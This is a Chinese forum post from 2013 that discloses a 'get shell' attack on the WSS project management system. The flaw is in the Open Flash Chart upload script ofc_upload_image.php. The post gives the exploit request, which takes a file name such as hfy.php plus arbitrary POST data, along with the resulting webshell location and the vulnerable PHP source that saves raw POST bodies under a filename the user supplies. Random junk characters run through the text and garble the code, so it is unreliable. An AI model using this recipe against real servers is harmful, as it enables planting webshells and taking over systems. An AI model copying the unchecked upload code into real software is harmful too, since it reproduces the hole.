标题: WSS项目管理系统Post get shell [打印本页] 作者: admin 时间: 2013-2-23 12:38 标题: WSS项目管理系统Post get shell POST 数据漏洞文件执行任意后缀文件保存9 v& Q8 p. d8 Z& v" N1 x6 h
漏洞文件/chart/php-ofc-library/ofc_upload_image.php + ~5 p9 x" e0 ^% e- e$ |- A- q1 a6 ?/ @
利用: 9 S: Y3 L, v4 X9 Q6 y/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名/ ?. J2 Y+ l! Q% w8 M, _/ G( e" |1 B: G
! y+ ^3 e0 |# X7 l+ Z1 Z
Post任意数据 0 c. d# O5 t0 g8 u7 X* h' ]保存位置http://localhost/chart/tmp-upload-images/hfy.php ' [( L5 f, Y0 `. e# }[attach]201[/attach] 1 m$ t- e# x6 P/ F! U2 C$ F8 B( I5 E[attach]202[/attach]: |) ?* V& p/ U3 H9 c% g5 l; ?
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~% |/ j7 i# |& K4 s4 Y2 o- i/ x, ]
, m, m( z+ t p; I, R# N
<?php. q) m* A1 {6 }; @' n/ K" a
9 \$ z/ G; Z. O5 U; D// # p: I1 Q% t+ \ @* L! r// In Open Flash Chart -> save_image debug mode, you Q% k) v+ ?- Y. M// will see the 'echo' text in a new window.+ i; X- ^8 C( c
// ! Z: m# ?7 G; I1 n 4 `" U7 g+ L! G" e: `/*1 o7 f; X. ?! c C: E8 P
# K0 I4 x4 Z+ C& n1 h) J0 }2 O
print_r( $_GET );% @) Q. k s( g( W. y
print_r( $_POST );( ~ q: A( @& s3 @4 d; y
print_r( $_FILES );! n( o' n# l# U, M
: j5 W/ q9 f8 h1 i3 m
print_r( $GLOBALS );' o# {" T7 @. L+ D
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );- X, }9 d e' A! t
9 L+ L7 u: ~& s6 m# {4 S*/2 V7 u, j' I" Z' I: D
// default path for the image to be stored //8 t3 y0 @& E5 w3 a9 x h# }
$default_path = '../tmp-upload-images/'; ; A7 j6 S2 P: o5 a- k / |9 x" p* i& L+ B, ~/ Uif (!file_exists($default_path)) mkdir($default_path, 0777, true); / ?* @9 m" V( _, [3 R8 e 4 ?0 k5 m* C! V' H- B, R// full path to the saved image including filename //* v7 y$ p2 Y& q, u7 D
$destination = $default_path . basename( $_GET[ 'name' ] ); . y! I+ n- T- P+ x- d+ I: Y$ E ( e2 L4 Q) t' U3 P: N2 z; C0 e" \( |echo 'Saving your image to: '. $destination;+ r! L. n% B m7 L
// print_r( $_POST ); ' l0 R. N# Y" [: ^4 W, y' ]. a// print_r( $_SERVER ); ! H7 r- k) v" o4 f# U* l0 y// echo $HTTP_RAW_POST_DATA; 9 K- I: T7 N# z3 e : _( j5 ^" e; ~// # G2 N K6 l2 G6 ^% H// POST data is usually string data, but we are passing a RAW .png+ B1 S5 z& J$ }5 Z8 e
// so PHP is a bit confused and $_POST is empty. But it has saved' y+ }# d/ V q: O, w
// the raw bits into $HTTP_RAW_POST_DATA ( y! @- v. s4 V9 Q//) [2 |) Z4 f; V
: @7 F$ n; E( z) s
$jfh = fopen($destination, 'w') or die("can't open file"); 2 k0 I3 k6 {0 Yfwrite($jfh, $HTTP_RAW_POST_DATA);6 K& Z: b% t. k' F0 |2 g1 y% g* b7 s
fclose($jfh);; x! K- _# k8 [
8 f, W) d# s5 h9 m
//) X, N d# x4 N1 d# ^, t
// LOOK: e+ V o7 @0 |" G// ) k/ I( I! O& G7 e4 y8 D! v& B$ u6 oexit();1 r$ h" [" R; d5 M
// 8 \! _! r: `+ _4 w: E; @) ^. h+ _// PHP5: / N: C O% q$ z! }6 z! ?2 J7 A4 S// ; P0 v6 G$ q/ M5 ~& H1 b6 E - Q# ], k% p1 l( R, I* A2 b0 [1 O, c
// default path for the image to be stored // 9 ^# V6 v. e! X) ^3 B$default_path = 'tmp-upload-images/'; Y! t( V7 [; w1 M9 e( D$ T2 u4 {1 [, M4 Z/ B* M* |
if (!file_exists($default_path)) mkdir($default_path, 0777, true); # a5 M8 @# K- d3 H$ ?. R0 j: d* E8 ^0 W; Z; ?
// full path to the saved image including filename // ( }) U& I7 Z4 u2 e- V$ J$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); 9 ~! Y- q9 E% ^; S" ~
p; E3 {4 Q9 u0 r; `! G// move the image into the specified directory //' n6 {! u8 A3 H$ h
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {- Q ]* _) v3 ~) S' b0 s$ H
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";3 g p5 k: Y+ Y% J- h, m$ F& x: K
} else {# \9 {6 g5 U, \: M; K* R
echo "FILE UPLOAD FAILED";2 P3 w+ i. O4 r* w7 k$ [2 E' J
} , m7 ]$ d/ I9 o I# c/ z. f+ u% v( ~. f1 {8 t. e